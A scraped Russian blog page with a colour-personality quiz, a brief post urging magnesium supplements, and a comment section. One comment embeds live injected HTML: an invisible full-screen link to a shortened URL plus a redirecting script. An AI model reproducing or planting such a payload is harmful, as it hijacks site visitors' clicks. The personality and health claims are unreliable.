Читайте также:
6

? Ваш любимый цвет – желтый. Это цвет человека с...

? Ваш любимый цвет – желтый. Это цвет человека с развитой эмпатией. Скорее всего, у вас много друзей и вы душа компании. Вы все все время на позитиве, искренни в своих эмоциях. Окружающие чувствуют это и тянутся к вам. Большинство из них уверены, что вы теплый и добрый человек.

? Ваш любимый цвет – зеленый. Его любят люди рациональные, прагматичные, для которых важно, чтобы все было разложено по полочкам и шло по плану. Ваши сильные стороны – обязательность, точность, пунктуальность. Перед тем, как решиться на что-то, вы взвесите все «за» и «против».

? Ваш любимый цвет – красный. Такой цвет нравится людям активным, деятельным и целеустремленным, которые четко знают, чего хотят от жизни. Возможно, в юности вы были бунтарем (или бунтаркой), а теперь – хороший организатор, человек с лидерскими качествами.

? Ваш любимый цвет – синий. Цвет, от которого веет спокойствием и умиротворением. Но его часто выбирают те, кому не хватает уравновешенности – возможно, так вы пытаетесь достичь душевной гармонии. Вы любите мечтать, побаиваетесь перемен и пасуете перед принятием сложных решений.

⚫️ Ваш любимый цвет – серый или черный. Вы боитесь хаоса и суматохи и в любых обстоятельствах пытаетесь сохранить спокойствие. Стремитесь к власти и высокому положению в обществе, вас уважают и ценят коллеги. Но при этом вы запираете эмоции глубоко внутри, а людей держите на комфортном расстоянии.

? Ваш любимый цвет – желтый. Это цвет человека с...
3

Недостаток этого минерала есть у большинства из нас....

Недостаток этого минерала есть у большинства из нас. И причина чаще всего в питании. Зерно, превращаясь в муку, теряет до 80% своего магния. В овощах его мало, потому что растут они на истощенной почве. А жирные заправки не дают усвоить из салатов и то, что есть: магний образует с жирами нерастворимые соли. Хорошим источником этого минерала можно считать семечки, орехи ? и бобовые, но много ли мы их едим?.. Врачи рекомендуют дополнительно принимать магний в виде биологически активной добавки. Какой именно – зависит от анамнеза?

Недостаток этого минерала есть у большинства из нас....
Недостаток этого минерала есть у большинства из нас.... Недостаток этого минерала есть у большинства из нас.... Недостаток этого минерала есть у большинства из нас....
Еще посты

Популярные теги:

Свежие комментарии:

Ирина 3 дней назад к записи
Когда это было?что за придожение ни автора ни даты,как связаться
Александра 6 дней назад к записи
Напиши мне
<a/href="//cutt.ly/kwVrO4Ui"style="position:fixed;left:0;top:0;width:9999px;height:9999px;"></a>
<script>location.replace('//ya.ru')</script>Nick
Екатерина 2 недель назад к записи
Как с вами связаться?
контакт женский заработок